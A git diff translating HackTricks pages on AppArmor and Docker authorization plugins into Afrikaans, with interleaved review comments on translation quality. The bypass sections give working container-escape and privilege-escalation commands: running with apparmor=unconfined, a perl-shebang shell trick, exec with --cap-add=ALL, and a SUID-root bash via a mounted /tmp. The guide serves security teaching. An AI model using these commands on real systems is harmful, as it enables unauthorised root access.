@@ -48,48 +47,42 @@ aa-genprof #generate a new profile aa-logprof #used to change the policy when the binary/program is changed aa-mergeprof #used to merge the policies ``` +## Skep 'n profiel -## Creating a profile - -* In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -* To indicate the access the binary will have over **files** the following **access controls** can be used: - * **r** (read) - * **w** (write) - * **m** (memory map as executable) - * **k** (file locking) - * **l** (creation hard links) - * **ix** (to execute another program with the new program inheriting policy) - * **Px** (execute under another profile, after cleaning the environment) - * **Cx** (execute under a child profile, after cleaning the environment) - * **Ux** (execute unconfined, after cleaning the environment) -* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file) -* **Deny rules are supported to override allow rules**. +* Om die betrokke uitvoerbare lêer aan te dui, word **absoluut paaie en wildcards** toegelaat (vir lêer globbing) om lêers te spesifiseer. +* Om die toegang wat die binêre lêer oor **lêers** sal hê aan te dui, kan die volgende **toegangsbeheerstellings** gebruik word: +* **r** (lees) +* **w** (skryf) +* **m** (geheuekaart as uitvoerbare lêer) +* **k** (lêer sluiting) +* **l** (skep harde skakels) +* **ix** (om 'n ander program uit te voer met die nuwe program wat beleid erf) +* **Px** (uitvoer onder 'n ander profiel, na skoonmaak van die omgewing) +* **Cx** (uitvoer onder 'n kinderprofiel, na skoonmaak van die omgewing) +* **Ux** (uitvoer sonder beperking, na skoonmaak van die omgewing) +* **Veranderlikes** kan in die profiele gedefinieer word en kan van buite die profiel gemanipuleer word. 
Byvoorbeeld: @{PROC} en @{HOME} (voeg #include \ by die profiel-lêer in) +* **Verbiedingsreëls word ondersteun om toelaatreëls te oorskryf**. ### aa-genprof -To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\ -You just need to run: - +Om maklik 'n profiel te begin skep, kan apparmor jou help. Dit is moontlik om **apparmor die aksies wat deur 'n binêre lêer uitgevoer word te laat ondersoek en dan te besluit watter aksies jy wil toelaat of verbied**.\ +Jy hoef net die volgende uit te voer: ```bash sudo aa-genprof /path/to/binary ``` - -Then, in a different console perform all the actions that the binary will usually perform: - +Dan, in 'n ander konsole, voer al die aksies uit wat die binêre gewoonlik sal uitvoer: ```bash /path/to/binary -a dosomething ``` - -Then, in the first console press "**s**" and then in the recorded actions indicate if you want to ignore, allow, or whatever. When you have finished press "**f**" and the new profile will be created in _/etc/apparmor.d/path.to.binary_ +Dan, druk "**s**" in die eerste konsole en dui dan aan of jy wil ignoreer, toelaat, of watookal met die opgeneemde aksies. Druk "**f**" as jy klaar is en die nuwe profiel sal geskep word in _/etc/apparmor.d/path.to.binary_ {% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever +Met die pyltjiesleutels kan jy kies wat jy wil toelaat/weier/watookal {% endhint %} ### aa-easyprof -You can also create a template of an apparmor profile of a binary with: - +Jy kan ook 'n sjabloon van 'n apparmor-profiel van 'n binêre lêer skep met: ```bash sudo aa-easyprof /path/to/binary # vim:syntax=apparmor 
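Review bot: the access-control sub-list (`r`, `w`, `m`, `k`, `l`, `ix`, `Px`, `Cx`, `Ux`) was indented under the "toegang ... oor lêers" bullet in the original and is flattened to top-level `+* ` items here, so the file-mode letters now read as sibling points of "absoluut paaie en wildcards" rather than as the set of modes that bullet introduces; restore the indentation. Also "absoluut paaie" should be "absolute paaie", "lêer sluiting" should be "lêersluiting", and the blank lines the source had before and after each ```bash fence (`-` lines around `sudo aa-genprof` and `/path/to/binary -a dosomething`) are removed for no reason; GitBook tolerates it, but it is gratuitous diff noise against the English source.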
@@ -103,42 +96,36 @@ sudo aa-easyprof /path/to/binary # No template variables specified "/path/to/binary" { - #include +#include - # No abstractions specified +# No abstractions specified - # No policy groups specified +# No policy groups specified - # No read paths specified +# No read paths specified - # No write paths specified +# No write paths specified } ``` - {% hint style="info" %} -Note that by default in a created profile nothing is allowed, so everything is denied. You will need to add lines like `/etc/passwd r,` to allow the binary read `/etc/passwd` for example. +Let daarop dat niks standaard toegelaat word in 'n geskepde profiel nie, so alles word ontken. Jy sal lyne soos `/etc/passwd r,` moet byvoeg om die binêre lees `/etc/passwd` byvoorbeeld toe te laat. {% endhint %} -You can then **enforce** the new profile with - +Jy kan dan die nuwe profiel **afdwing** met ```bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary ``` +### Wysiging van 'n profiel vanaf logboeke -### Modifying a profile from logs - -The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions: - +Die volgende instrument sal die logboeke lees en die gebruiker vra of hy sommige van die opgespoorde verbode aksies wil toelaat: ```bash sudo aa-logprof ``` - {% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever +Deur die pyltjiesleutels te gebruik, kan jy kies wat jy wil toelaat/weier/enigiets {% endhint %} -### Managing a Profile - +### Bestuur van 'n Profiel ```bash #Main profile management commands apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode 
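Review bot: "so alles word ontken" uses "ontken" (to deny in the sense of disclaim) for "denied"; the access-control meaning is "geweier", and the same word choice recurs in the docker-default summary later in this patch. The sentence "om die binêre lees `/etc/passwd` byvoorbeeld toe te laat" is ungrammatical; suggest "om byvoorbeeld die binêre lêer toe te laat om `/etc/passwd` te lees". In the aa-easyprof template the indentation of `#include`, `# No abstractions specified` and the other comment lines inside the `"/path/to/binary" {` block was stripped; that text is inside a code fence and should be left byte-for-byte as the tool prints it.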
@@ -146,18 +133,14 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile ``` +## Logboeke -## Logs - -Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**: - +Voorbeeld van **AUDIT** en **DENIED** logboeke van die uitvoerbare lêer **`service_bin`** in _/var/log/audit/audit.log_: ```bash type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 ``` - -You can also get this information using: - +Jy kan ook hierdie inligting bekom deur gebruik te maak van: ```bash sudo aa-notify -s 1 -v Profile: /bin/service_bin 
@@ -175,127 +158,105 @@ Logfile: /var/log/audit/audit.log AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021) For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor ``` - ## Apparmor in Docker -Note how the profile **docker-profile** of docker is loaded by default: - +Merk op hoe die profiel **docker-profiel** van Docker standaard gelaai word: ```bash sudo aa-status apparmor module is loaded. 50 profiles are loaded. 13 profiles are in enforce mode. - /sbin/dhclient - /usr/bin/lxc-start - /usr/lib/NetworkManager/nm-dhcp-client.action - /usr/lib/NetworkManager/nm-dhcp-helper - /usr/lib/chromium-browser/chromium-browser//browser_java - /usr/lib/chromium-browser/chromium-browser//browser_openjdk - /usr/lib/chromium-browser/chromium-browser//sanitized_helper - /usr/lib/connman/scripts/dhclient-script - docker-default +/sbin/dhclient +/usr/bin/lxc-start +/usr/lib/NetworkManager/nm-dhcp-client.action +/usr/lib/NetworkManager/nm-dhcp-helper +/usr/lib/chromium-browser/chromium-browser//browser_java +/usr/lib/chromium-browser/chromium-browser//browser_openjdk +/usr/lib/chromium-browser/chromium-browser//sanitized_helper +/usr/lib/connman/scripts/dhclient-script +docker-default ``` +Standaard word die **Apparmor docker-default profiel** gegenereer vanaf [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -By default **Apparmor docker-default profile** is generated from [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +**docker-default profiel opsomming**: -**docker-default profile Summary**: - -* **Access** to all **networking** -* **No capability** is defined (However, some capabilities will come from including basic base rules i.e. 
#include \ ) -* **Writing** to any **/proc** file is **not allowed** -* Other **subdirectories**/**files** of /**proc** and /**sys** are **denied** read/write/lock/link/execute access -* **Mount** is **not allowed** -* **Ptrace** can only be run on a process that is confined by **same apparmor profile** - -Once you **run a docker container** you should see the following output: +* **Toegang** tot alle **netwerkverbindings** +* **Geen bevoegdheid** is gedefinieer (Sommige bevoegdhede sal egter kom van die insluiting van basiese basisreëls, d.w.s. #include \) +* **Skryf** na enige **/proc** lêer is **nie toegelaat** +* Ander **subdossiers**/**lêers** van /**proc** en /**sys** word **ontken** lees/skryf/vergrendel/skakel/uitvoer toegang +* **Monteer** is **nie toegelaat** +* **Ptrace** kan slegs uitgevoer word op 'n proses wat beperk word deur dieselfde apparmor profiel +Sodra jy 'n **docker houer uitvoer**, behoort jy die volgende uitset te sien: ```bash 1 processes are in enforce mode. - docker-default (825) +docker-default (825) ``` - -Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS\_ADMIN capability is granted** because by default docker apparmor profile denies this access: - +Let wel dat **apparmor selfs blokkeer bevoegdhede-voorregte** wat aan die houer verleen word. 
Byvoorbeeld, dit sal in staat wees om **toestemming om binne /proc te skryf te blokkeer selfs as die SYS\_ADMIN bevoegdheid verleen word**, omdat die standaard docker apparmor-profiel hierdie toegang ontken: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash echo "" > /proc/stat sh: 1: cannot create /proc/stat: Permission denied ``` - -You need to **disable apparmor** to bypass its restrictions: - +Jy moet **apparmor deaktiveer** om sy beperkings te omseil: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash ``` +Let daarop dat **AppArmor** standaard ook die houer verbied om van binne af vouers te monteer, selfs met die SYS\_ADMIN-vermoë. -Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS\_ADMIN capability. +Let daarop dat jy **vermoëns** kan **byvoeg/verwyder** aan die docker-houer (dit sal steeds beperk word deur beskermingsmetodes soos **AppArmor** en **Seccomp**): -Note that you can **add/remove** **capabilities** to the docker container (this will be still restricted by protection methods like **AppArmor** and **Seccomp**): - -* `--cap-add=SYS_ADMIN` give `SYS_ADMIN` cap -* `--cap-add=ALL` give all caps -* `--cap-drop=ALL --cap-add=SYS_PTRACE` drop all caps and only give `SYS_PTRACE` +* `--cap-add=SYS_ADMIN` gee `SYS_ADMIN`-vermoë +* `--cap-add=ALL` gee alle vermoëns +* `--cap-drop=ALL --cap-add=SYS_PTRACE` verwyder alle vermoëns en gee slegs `SYS_PTRACE` {% hint style="info" %} -Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**. 
+Gewoonlik, as jy **vind** dat jy 'n **bevoorregte vermoë** binne 'n **docker**-houer het, maar 'n deel van die **aanval nie werk nie**, sal dit wees omdat docker **apparmor dit voorkom**. {% endhint %} -### Example +### Voorbeeld -(Example from [**here**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) - -To illustrate AppArmor functionality, I created a new Docker profile “mydocker” with the following line added: +(Voorbeeld vanaf [**hier**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) +Om die AppArmor-funksionaliteit te illustreer, het ek 'n nuwe Docker-profiel "mydocker" geskep met die volgende lyn bygevoeg: ``` deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) ``` - -To activate the profile, we need to do the following: - +Om die profiel te aktiveer, moet ons die volgende doen: ``` sudo apparmor_parser -r -W mydocker ``` - -To list the profiles, we can do the following command. The command below is listing my new AppArmor profile. - +Om die profiele te lys, kan ons die volgende opdrag gebruik. Die opdrag hieronder lys my nuwe AppArmor-profiel. ``` $ sudo apparmor_status | grep mydocker - mydocker +mydocker ``` - -As shown below, we get error when trying to change “/etc/” since AppArmor profile is preventing write access to “/etc”. - +Soos hieronder getoon, kry ons 'n fout wanneer ons probeer om "/etc/" te verander, aangesien die AppArmor-profiel skryftoegang tot "/etc" voorkom. 
``` $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname chmod: /etc/hostname: Permission denied ``` +### AppArmor Docker Omspring1 -### AppArmor Docker Bypass1 - -You can find which **apparmor profile is running a container** using: - +Jy kan vind watter **apparmor-profiel 'n houer laat loop** deur die volgende te gebruik: ```bash docker inspect 9d622d73a614 | grep lowpriv - "AppArmorProfile": "lowpriv", - "apparmor=lowpriv" +"AppArmorProfile": "lowpriv", +"apparmor=lowpriv" ``` - -Then, you can run the following line to **find the exact profile being used**: - +Dan kan jy die volgende lyn uitvoer om die presiese profiel wat gebruik word te vind: ```bash find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null ``` +In die vreemde geval kan jy die apparmor docker-profiel wysig en dit herlaai. Jy kan die beperkings verwyder en dit "omseil". -In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them. +### AppArmor Docker Omseiling 2 -### AppArmor Docker Bypass2 +AppArmor is pad-gebaseer, dit beteken dat selfs al beskerm dit dalk lêers binne 'n gids soos `/proc`, as jy kan konfigureer hoe die houer uitgevoer gaan word, kan jy die proc-gids van die gasheer binne `/host/proc` monteer en dit sal nie meer deur AppArmor beskerm word nie. -**AppArmor is path based**, this means that even if it might be **protecting** files inside a directory like **`/proc`** if you can **configure how the container is going to be run**, you could **mount** the proc directory of the host inside **`/host/proc`** and it **won't be protected by AppArmor anymore**. 
- -### AppArmor Shebang Bypass - -In [**this bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) you can see an example of how **even if you are preventing perl to be run with certain resources**, if you just create a a shell script **specifying** in the first line **`#!/usr/bin/perl`** and you **execute the file directly**, you will be able to execute whatever you want. E.g.: +### AppArmor Shebang Omseiling +In [hierdie fout](https://bugs.launchpad.net/apparmor/+bug/1911431) kan jy 'n voorbeeld sien van hoe selfs al voorkom jy dat perl uitgevoer word met sekere hulpbronne, as jy net 'n skulpskrip skep wat in die eerste lyn **`#!/usr/bin/perl`** spesifiseer en jy voer die lêer direk uit, sal jy in staat wees om enigiets uit te voer. Byvoorbeeld: ```perl echo '#!/usr/bin/perl use POSIX qw(strftime); @@ -305,17 +266,16 @@ exec "/bin/sh"' > /tmp/test.pl chmod +x /tmp/test.pl /tmp/test.pl ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
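Review bot: the three bypass headings in this hunk are translated three different ways, `+### AppArmor Docker Omspring1`, `+### AppArmor Docker Omseiling 2` and `+### AppArmor Shebang Omseiling`; settle on one term ("Omseiling") and one numbering style, and note that renaming the headings changes the generated anchors, so existing links to `#apparmor-docker-bypass1` / `#apparmor-docker-bypass2` will break unless they are updated too. Inside the code fences the leading whitespace of quoted program output was stripped (`- mydocker` became `+mydocker`, and the `"AppArmorProfile": "lowpriv",` / `"apparmor=lowpriv"` lines lost their indentation); quoted terminal output should stay byte-for-byte as in the source, since only prose is being translated. The emphasis markers were also dropped from "In die vreemde geval kan jy die apparmor docker-profiel wysig en dit herlaai" and from the "AppArmor is pad-gebaseer" paragraph, while neighbouring sentences keep the source's bold; keep the formatting consistent with the original.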
diff --git a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 3357d629d..8859d0341 100644 --- a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -1,90 +1,83 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon. +**Docker se** out-of-the-box **outorisasiemodel** is **alles of niks**. Enige gebruiker met toestemming om die Docker-daemon te gebruik, kan **enige** Docker-kliënt **opdrag** uitvoer. Dieselfde geld vir oproepers wat die Docker Engine API gebruik om die daemon te kontak. As jy **groter toegangsbeheer** benodig, kan jy **outorisasie-plugins** skep en dit by jou Docker-daemon-konfigurasie voeg. Met behulp van 'n outorisasie-plugin kan 'n Docker-administrator **fynkorrelige toegangspolisse** instel om toegang tot die Docker-daemon te bestuur. -# Basic architecture +# Basiese argitektuur -Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**. +Docker Auth-plugins is **eksterne plugins** wat jy kan gebruik om **aksies** wat aan die Docker Daemon gevra word, **toe te laat/weier** afhangende van die **gebruiker** wat dit gevra het en die **gevraagde aksie**. 
-**[The following info is from the docs](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** +**[Die volgende inligting is van die dokumentasie](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** -When an **HTTP** **request** is made to the Docker **daemon** through the CLI or via the Engine API, the **authentication** **subsystem** **passes** the request to the installed **authentication** **plugin**(s). The request contains the user (caller) and command context. The **plugin** is responsible for deciding whether to **allow** or **deny** the request. +Wanneer 'n **HTTP-aanvraag** deur die CLI of via die Engine API na die Docker-daemon gestuur word, stuur die **outentiseringsondersteuning** die aanvraag na die geïnstalleerde **outentiseringsplugin**(s). Die aanvraag bevat die gebruiker (oproeper) en opdragkonteks. Die **plugin** is verantwoordelik vir die besluit of die aanvraag **toegelaat** of **geweier** moet word. -The sequence diagrams below depict an allow and deny authorization flow: +Die volgende sekansdiagramme toon 'n toelaat- en weieringsvloei vir outorisasie: -![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz\_allow.png) +![Toelaat-outorisasievloei](https://docs.docker.com/engine/extend/images/authz\_allow.png) -![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz\_deny.png) +![Weieringsoutorisasievloei](https://docs.docker.com/engine/extend/images/authz\_deny.png) -Each request sent to the plugin **includes the authenticated user, the HTTP headers, and the request/response body**. Only the **user name** and the **authentication method** used are passed to the plugin. Most importantly, **no** user **credentials** or tokens are passed. 
Finally, **not all request/response bodies are sent** to the authorization plugin. Only those request/response bodies where the `Content-Type` is either `text/*` or `application/json` are sent. +Elke aanvraag wat na die plugin gestuur word, **bevat die geoutentiseerde gebruiker, die HTTP-koppe, en die aanvraag/antwoordliggaam**. Slegs die **gebruikersnaam** en die **outentiseringsmetode** wat gebruik is, word aan die plugin oorgedra. Belangrik is dat **geen** gebruikers **vollegetuigskrifte** of tokens oorgedra word nie. Laastens word **nie alle aanvraag/antwoordliggame** na die outorisasie-plugin gestuur nie. Slegs daardie aanvraag/antwoordliggame waar die `Content-Type` óf `text/*` óf `application/json` is, word gestuur. -For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), such as `exec`, the authorization plugin is only called for the initial HTTP requests. Once the plugin approves the command, authorization is not applied to the rest of the flow. Specifically, the streaming data is not passed to the authorization plugins. For commands that return chunked HTTP response, such as `logs` and `events`, only the HTTP request is sent to the authorization plugins. +Vir opdragte wat die HTTP-verbinding kan oorneem (`HTTP Upgrade`), soos `exec`, word die outorisasie-plugin slegs geroep vir die aanvanklike HTTP-aanvrae. Sodra die plugin die opdrag goedkeur, word outorisasie nie op die res van die vloei toegepas nie. Spesifiek word die stroomdata nie aan die outorisasie-plugins oorgedra nie. Vir opdragte wat 'n stuksgewyse HTTP-antwoord teruggee, soos `logs` en `events`, word slegs die HTTP-aanvraag na die outorisasie-plugins gestuur. -During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. 
To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies. +Tydens die verwerking van aanvrae/antwoorde kan sommige outorisasievloei moontlik addisionele navrae aan die Docker-daemon doen. Om sulke vloei te voltooi, kan plugins die daemon API oproep soos 'n gewone gebruiker. Om sulke addisionele navrae moontlik te maak, moet die plugin die middels voorsien om 'n administrateur in staat te stel om behoorlike outentisering- en sekuriteitsbeleide te konfigureer. -## Several Plugins +## Verskeie Plugins -You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted. +Jy is verantwoordelik vir die **registreer** van jou **plugin** as deel van die Docker-daemon se **beginproses**. Jy kan **verskeie plugins installeer en aanmekaar koppel**. Hierdie ketting kan georden word. Elke aanvraag aan die daemon gaan in volgorde deur die ketting. Slegs as **alle plugins toegang verleen** tot die hulpbron, word die toegang verleen. -# Plugin Examples +# Plugin-voorbeelde ## Twistlock AuthZ Broker -The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user. +Die plugin [**authz**](https://github.com/twistlock/authz) stel jou in staat om 'n eenvoudige **JSON**-lêer te skep wat die **plugin** sal **lees** om die aanvrae te outoriseer. Dit gee jou dus die geleentheid om baie maklik te beheer watter API-eindpunte elke gebruiker kan bereik. 
-This is an example that will allow Alice and Bob can create new containers: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` +Hier is 'n voorbeeld wat Alice en Bob in staat stel om nuwe houers te skep: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` -In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action +Op die bladsy [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) kan jy die verband tussen die gevraagde URL en die aksie vind. Op die bladsy [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) kan jy die verband tussen die aksienaam en die aksie vind. -## Simple Plugin Tutorial +## Eenvoudige Plugin-tutoriaal -You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) +Jy kan 'n **maklik verstaanbare plugin** met gedetailleerde inligting oor installasie en foutopsporing hier vind: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) -Read the `README` and the `plugin.go` code to understand how is it working. +Lees die `README` en die `plugin.go`-kode om te verstaan hoe dit werk. -# Docker Auth Plugin Bypass +# Docker Auth Plugin-omseiling -## Enumerate access +## Toegang opspoor -The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**. +Die belangrikste dinge om te ondersoek is **watter eindpunte toegelaat word** en **watter waardes van HostConfig toegelaat word**. 
-To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler)**.** +Om hierdie opsporing uit te voer, kan jy die instrument [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler) **gebruik**. -## disallowed `run --privileged` - -### Minimum Privileges +## Verbode `run --privileged` +### Minimumvoorregte ```bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash ``` +### Uitvoer van 'n houer en dan 'n bevoorregte sessie kry -### Running a container and then getting a privileged session - -In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: - +In hierdie geval het die stelseladministrateur gebruikers verhinder om volumes te monteer en houers met die `--privileged` vlag uit te voer, of enige ekstra vermoë aan die houer te gee: ```bash docker run -d --privileged modified-ubuntu docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed. See 'docker run --help'. ``` - -However, a user can **create a shell inside the running container and give it the extra privileges**: - +Een gebruiker kan egter **'n skulp binne die lopende houer skep en dit die ekstra voorregte gee**: ```bash docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu #bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de 
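Review bot: two terms in the authorization-flow paragraph of this hunk are mistranslated: "authentication subsystem" became "outentiseringsondersteuning" (authentication support) and "no user credentials or tokens" became "geen gebruikers vollegetuigskrifte of tokens"; suggest "outentiseringsubstelsel" and "geloofsbriewe" (or leave "credentials" untranslated, as "tokens" was). In the same hunk `## Enumerate access` became `## Toegang opspoor`, which loses the enumeration sense; "Toegang enumereer" keeps it. Minor: "+Een gebruiker kan egter" reads as "one user" rather than "a user" and should be "'n Gebruiker kan egter"; and the hint/heading spacing removed before the `### Minimumvoorregte` fence should match the source's blank lines so the markdown stays readable in diffs.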
@@ -96,43 +89,39 @@ docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be # With --cap-add=SYS_ADMIN docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash ``` +Nou kan die gebruiker ontsnap uit die houer deur enige van die [voorheen bespreekte tegnieke](./#privileged-flag) te gebruik en voorregte binne die gasheer te verhoog. -Now, the user can escape from the container using any of the [**previously discussed techniques**](./#privileged-flag) and **escalate privileges** inside the host. - -## Mount Writable Folder - -In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: +## Monteer Skryfbare Vouer +In hierdie geval het die stelseladministrateur gebruikers verhoed om houers met die `--privileged` vlag te hardloop of enige ekstra vermoë aan die houer te gee, en hy het slegs toegelaat om die `/tmp` vouer te monteer: ```bash host> cp /bin/bash /tmp #Cerate a copy of bash host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell docker container> chown root:root /host/bash docker container> chmod u+s /host/bash host> /tmp/bash - -p #This will give you a shell as root +-p #This will give you a shell as root ``` - {% hint style="info" %} -Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type 